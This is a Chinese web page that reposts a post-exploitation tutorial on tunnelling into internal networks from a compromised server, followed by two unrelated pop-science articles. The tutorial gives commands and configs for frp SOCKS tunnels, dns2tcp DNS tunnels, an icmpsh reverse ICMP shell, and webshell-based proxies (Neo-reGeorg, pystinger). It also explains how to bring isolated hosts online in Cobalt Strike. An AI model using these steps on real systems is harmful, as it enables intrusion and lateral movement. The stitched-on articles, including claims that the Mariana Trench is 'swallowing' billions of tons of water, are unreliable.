首页 > 电脑

内网穿透以后访问主机数据库内网渗透之主机出网OR不出网隧道搭建

电脑 2026-06-04 菜科探索 +
简介:当拿到权限之后,做完本地信息收集,最重要的就是做个隧道,对内网进行下一步攻击,这里简单介绍几个常用的工

【菜科解读】

当拿到权限之后,做完本地信息收集,最重要的就是做个隧道,对内网进行下一步攻击,这里简单介绍几个常用的工具,主要针对于出网和不出网两种情况。

出网情况

拿到服务器权限之后,遇见这种机器,十分简单,针对不同情况搭建不同隧道,为了速度可以建立sockets隧道、为了隐蔽可以使用dns隧道、icmp隧道等,本文简单介绍几个常用工具。

frp

frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。

可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。

项目地址:https://github.com/fatedier/frp/

下载之后,我们只需要关注四个文件即可:

frps

frps.ini

frpc

frpc.ini

修改frpc.ini,这里搭建sockets隧道,上传至目标服务器启动即可。

./frpc-cfrpc.ini

内网穿透以后怎么访问主机数据库 内网渗透之主机出网OR不出网隧道搭建(1)

服务端根据frps.ini修改端口

内网穿透以后怎么访问主机数据库 内网渗透之主机出网OR不出网隧道搭建(2)

启动监听

./frps-cfrps.ini

即可建立sockets隧道,利用Proxifierprox等,即可全局代理隧道,访问目标主机内网。

dns

这个比较麻烦需要准备一个域名,和一台DNS服务器,在域名解析添加一条NS记录和一条A记录。

举个例子,域名是123.com,添加一个子域名a.123.com,且类型为NS,并将NS记录指向b.123.com,然后将b.123.com建立A记录服务器IP即可,利用的工具也很多,本文简单介绍dns2tcp。

a.123.comNSb.123.com b.123.comA1.1.1.1

项目地址:https://github.com/HEYAHONG/dns2tcp

客户端

dns2tcpc-rnc-za.123.com1.1.1.1-l8888-d2 -r后接服务名称任意换,本文用nc -z后接NS记录的网址 -l后接本地端口

服务端

修改dns2tcpd.conf,

listen=0.0.0.0 port=53 user=root chroot=http://www.studyofnet.com/home/ domain=a.123.com key=123 resources=ssh:127.0.0.1:22,smtp:127.0.0.1:25,socks:127.0.0.1:1080,http:127.0.0.1:80,https:127.0.0.1:8080

然后执行,dns隧道就搭建好了,利用nc进行传输文件即可。

dns2tcpd-F-d3-f/home/dns2tcpd.conf

建立传输

目标主机监听并接受文件即可。

icmp

icmp隧道主要因为大部分防火墙不会屏蔽 ping ,所以可以将流量封装在icmp进行传输,这种速度跟sockets相比太慢了,特殊情况才会使用。

项目地址:https://github.com/inquisb/icmpsh

服务端:

python icmpsh_m.py ip 目标ip

目标机

icmpsh.exe-t目标ip

即可反弹icmp隧道shell回来。

内网穿透以后怎么访问主机数据库 内网渗透之主机出网OR不出网隧道搭建(5)

不出网情况

拿到服务器权限之后,遇见这种机器,只能利用基于webshell的代理,只需要将webshell上传到目标主机即可,然后建立tcp连接,主要利用session来识别不同的的tcp连接,我们攻击监听tcp,将数据post提交到webshell即可进行传输,本文简单介绍两个常用的。

Neo-reGeorg

Neo-reGeorg相当于是 reGeorg的升级版,有了更强的隐蔽性,原理都是相同的,常用于webshell代理流量,进而进行内网渗透。

项目地址:https://github.com/L-codes/Neo-reGeorg

首先需要设置密码,生成各种类型webshell,并上传至目标服务器

pythonneoreg.pygenerate-kpassword

内网穿透以后怎么访问主机数据库 内网渗透之主机出网OR不出网隧道搭建(6)

上传至服务器即可,然后启动监听即可

pythonneoreg.py-kpassword-u

最后挂上sockets代理即可访问内网。

pystinger

毒刺(pystinger)通过webshell实现内网socks4代理,并且可以利用pystinge实现各种cs\msf上线,目前仅支持php、jsp(x)、aspx.

项目地址:https://github.com/FunnyWolf/pystinger

这个工具比较强大,这里可以直接上线cs,简单介绍如何搭建socks4以及cs上线。

socks4隧道搭建:

首先上传proxy.php,然后上传stinger_server.exe 到目标服务器,并start命令运行该程序

内网穿透以后怎么访问主机数据库 内网渗透之主机出网OR不出网隧道搭建(7)

最后在我们的服务器执行

./stinger_client-w

即可建立socks4隧道,利用Proxifierprox等,访问目标主机内网。

cs上线:

前面大体相同,首先上传proxy.php,然后上传stinger_server.exe 到目标服务器,启动利用冰蝎start启动即可

我们的服务器也需要进行监听

./stinger_client-w

然后cs进行监听,端口填写60020

内网穿透以后怎么访问主机数据库 内网渗透之主机出网OR不出网隧道搭建(8)

进而利用cs生成powershell

内网穿透以后怎么访问主机数据库 内网渗透之主机出网OR不出网隧道搭建(9)

执行可以利用pystinger,进行不出网主机上线。

End

这里只是抛砖引玉,引出一些在之前工作中针对于不出网以及出网主机,用过最多的几个隧道代理工具,还请各位大佬勿喷,有更好的工具多补充,共同交流,这样我们才能共同成长,格拉德威尔曾说过:“人们眼中的天才之所以卓越非凡,并非天资超人一等,而是付出了持续不断的努力。

1万小时的锤炼是任何人从平凡变成世界级大师的必要条件“。

宇宙太空十大怪异物质:幽灵粒子能穿透人体

  2月19日消息,宇宙之大,无奇不有,人类对于宇宙提出了很多设想,有的设想在宇宙中也被证实存在,在我们的宇宙空间中存在着一些奇怪的物质和美丽的现象,有些很大,有些很美丽,但有些却非常怪异。

现在让我们来了解一下宇宙中十大最怪异物质。

  【反物质】   正如电影《超人》中超人具有另一种反人格比扎罗,组成正常物质的粒子也有它们的分身。

例如,电子有负电荷,而它的反物质正电子则带有正电荷。

当物质和反物质发生碰撞时会相互湮灭,根据爱因斯坦提出的方程E=mc2,它们的质量会转化为纯能量。

某些未来太空飞船设计或将包含反物质发动机。

  【迷你黑洞】   如果关于引力的最新"膜宇宙学"理论是正确的,那么我们太阳系内实际上散布了大量迷你黑洞,每一个黑洞大小相当于一个原子核。

与正常大小的黑洞不同,这些迷你黑洞其实是宇宙大爆炸的原始残余物,因为它们与第五维空间紧密相连,因此它们也将极大的影响时空。

马里纳亚海沟海水倒流,马里亚纳海沟是不是把地球穿透了

很多对自然地理感兴趣的人都经常看一些世界未解之谜之类的书籍,比如百慕大三角、罗布泊之谜、消失在太平洋中的古大陆等等,世界未解之谜越多,其实越应该敬畏自然,敬畏地球,敬畏宇宙,因为最可怕的敌人就是因为我们对对方不了解。

而这世界上还有很多我们不知道的事情在发生,就像宇宙一样,我们越是研究宇宙,越发现它的庞大,它的不可知。

每一年,地球上都在发生着各种各样的事情,有人在的地方,这些事情会被媒体报道出去,但那些无人涉足的领域,就只能成为我们的盲区。

2018年,地球上就有三件事情,是我们无法理解的,科学家给出的结论其实也是在向人类发出警告,人类要保护地球。

其实保护地球这个理念,人类已经说了很多年,但是并没有得到人类更多的响应,而地球的变化却在成倍数的改变中,如果有一天当人类意识到保护地球迫在眉睫,那地球也许已经走向不可挽回的地步。

很多人都对于科学家还有相关组织和部门的警告当作是危言耸听,但其实地球已经开始在用行动亲自告诉人类,保护环境,保护地球不再是口号。

2018年上半年,日本经受了强台风和地震的影响,造成了无可估量的损失,而我国也是在继汶川地震之后,各地区的小地震不断,但这种不定期的小地震其实是在警告人们,威胁就在身边,如果不行动,那地球就不只是简单的小“惩罚”了。

这些都是地质灾害,而近些年地质灾害距离人类越来越近,到底是为什么,是地球对于人类的“惩罚”开始了吗?2018年发生了三件事情,是让很多人都疑惑不解的。

第一件就是,众所周知南极冰川一直都在消融,但是近几年,南极冰川消融速度飞快,甚至在今年二月份,南极冰川就变成了池塘的模样,如果再这样消融下去,总有一天,南极冰川将会全部消融,消融的冰川汇入大海,海平面持续上升,直到有一天淹没陆地,那人类未来去哪里居住,这是我们必须要提高警惕的理由。

第二件事情是马里亚纳海沟,最近科学家发现,马里亚纳海沟在偷偷的吞水,而它吞水的数量已经达到了几十亿吨,但是可怕的是,地球的海平面仍然在不断上升,也就是说,海平面上升的速度和数量远远超过吞水的速度和数量。

而这一现象是不是可以理解为,海平面上升的太快,地球通过吞水来缓解这一威胁。

第三件事情是三月份,肯尼亚下了一场特大暴雨,而且这场雨下了非常长的一段时间,而当暴雨停止后,地上却突然出现了一个巨大的裂缝,这个裂缝宽度达到了十五米,而专家给出的解释是,由于裂缝所处地区本来就地势不平,地下产生碰撞,然后形成地震,所以才会产生裂缝。

是否未来地球上更多的地方会变成像肯尼亚这样的情况呢。

地球上的地质灾害越来越多,这也是地球在一次次的向人类喊话,如果人类再不懂得保护环境、保护地球,那未来地球灾难将会越来越多。

海平面上升,台风肆虐,地震频发等等,这每一场灾难,都是人类无法承受的。

所以我们要做的就是要马上行动,开始保护地球。

许多国家和地区都已经开始意识到保护地球的重要性,2008年汶川地震,死伤人数惨重,日本海啸让日本人民受到很大的伤害,而南北极冰川消融,让北极熊,企鹅等生物的环境受到威胁,我们都是在同一条生物链上的生物,任何一方受到威胁,都是整条生物链的灾难。

而生物链最依赖的环境就是自然和地球,所以我们必须从保护环境,保护地球做起,来一步步挽救人类。

这些年,很多国家开始实施各种类型的保护自然的方法,比如垃圾分类、减少垃圾排放、对垃圾进行无污染处理、垃圾回收、对野生动物进行保护、保护水资源、污水净化再利用等待方法,相信依靠人类的智慧,再加上保护自然的决心,未来地球一定会越来越好,随着教育水平的提高,人们的觉悟也在不断提高,相信人类会意识到保护地球的重要性。

猜你喜欢

盘点数码世界的各种之最?
盘点数码世界的各种之最?
世界之最 2026-06-04
keep健身离线使用
keep健身离线使用
电脑教程 2026-06-04
win10死机怎么办
win10死机怎么办
电脑教程 2026-05-30
显卡烧了能修吗?
显卡烧了能修吗?
显卡 2026-05-29
enable电脑上是什么意思?
enable电脑上是什么意思?
电脑教程 2026-05-28
win7系统重装系统
win7系统重装系统
Win7教程 2026-05-28

内网穿透以后访问主机数据库内网渗透之主机出网OR不出网隧道搭建

点击下载文档

格式为doc格式